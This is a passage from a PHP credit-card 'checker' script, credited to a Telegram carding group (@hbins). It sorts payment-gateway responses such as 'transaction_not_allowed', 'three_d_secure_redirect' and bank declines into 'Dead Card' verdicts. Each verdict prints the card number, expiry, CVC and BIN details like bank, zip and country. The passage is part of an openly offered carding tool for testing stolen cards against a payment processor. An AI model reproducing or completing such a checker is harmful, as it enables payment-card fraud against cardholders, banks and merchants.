    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Parameter Invalid Empty </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ♛ ★ BINS 💳💰 ★ ♛</span></br><span class="badge badge-yellow">Telegram Username = @hbins</span></br><span class="badge badge-yellow">Channel Link = @hbins</span></br><span class="badge badge-yellow">Group link = @hbinsfamily</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/channel/UC90dEuWW1FabrwvmeJJeZnQ</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result,"lock_timeout")){
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Lock Timeout </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ♛ ★ BINS 💳💰 ★ ♛</span></br><span class="badge badge-yellow">Telegram Username = @hbins</span></br><span class="badge badge-yellow">Channel Link = @hbins</span></br><span class="badge badge-yellow">Group link = @hbinsfamily</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/channel/UC90dEuWW1FabrwvmeJJeZnQ</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result,'Your card does not support this type of purchase.')) {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Your card does not support this type of purchase </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ♛ ★ BINS 💳💰 ★ ♛</span></br><span class="badge badge-yellow">Telegram Username = @hbins</span></br><span class="badge badge-yellow">Channel Link = @hbins</span></br><span class="badge badge-yellow">Group link = @hbinsfamily</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/channel/UC90dEuWW1FabrwvmeJJeZnQ</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result,"transaction_not_allowed")){
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Transaction Not Allowed </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ♛ ★ BINS 💳💰 ★ ♛</span></br><span class="badge badge-yellow">Telegram Username = @hbins</span></br><span class="badge badge-yellow">Channel Link = @hbins</span></br><span class="badge badge-yellow">Group link = @hbinsfamily</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/channel/UC90dEuWW1FabrwvmeJJeZnQ</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result,"three_d_secure_redirect")){
     echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Three D Secure Redirect </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ♛ ★ BINS 💳💰 ★ ♛</span></br><span class="badge badge-yellow">Telegram Username = @hbins</span></br><span class="badge badge-yellow">Channel Link = @hbins</span></br><span class="badge badge-yellow">Group link = @hbinsfamily</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/channel/UC90dEuWW1FabrwvmeJJeZnQ</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, 'Card is declined by your bank, please contact them for additional information.')) {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Card is declined by your bank, please contact them for additional information </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ♛ ★ BINS 💳💰 ★ ♛</span></br><span class="badge badge-yellow">Telegram Username = @hbins</span></br><span class="badge badge-yellow">Channel Link = @hbins</span></br><span class="badge badge-yellow">Group link = @hbinsfamily</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/channel/UC90dEuWW1FabrwvmeJJeZnQ</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result,"missing_payment_information")){
     echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Missing Payment Information </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ♛ ★ BINS 💳💰 ★ ♛</span></br><span class="badge badge-yellow">Telegram Username = @hbins</span></br><span class="badge badge-yellow">Channel Link = @hbins</span></br><span class="badge badge-yellow">Group link = @hbinsfamily</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/channel/UC90dEuWW1FabrwvmeJJeZnQ</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, "Payment cannot be processed, missing credit card number")) {
     echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Payment cannot be processed, missing credit card number </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ♛ ★ BINS 💳💰 ★ ♛</span></br><span class="badge badge-yellow">Telegram Username = @hbins</span></br><span class="badge badge-yellow">Channel Link = @hbins</span></br><span class="badge badge-yellow">Group link = @hbinsfamily</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/channel/UC90dEuWW1FabrwvmeJJeZnQ</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
else {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Error Not Listed </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ♛ ★ BINS 💳💰 ★ ♛</span></br><span class="badge badge-yellow">Telegram Username = @hbins</span></br><span class="badge badge-yellow">Channel Link = @hbins</span></br><span class="badge badge-yellow">Group link = @hbinsfamily</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/channel/UC90dEuWW1FabrwvmeJJeZnQ</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
curl_close($ch);
ob_flush();
/////////////////////// 1req Raw Made By ♛ ★ BINS 💳💰 ★ ♛///////////////////////////////////
////////////////////// Join @hbins & @hbinsfamily for more  //////////////////////////////////
?>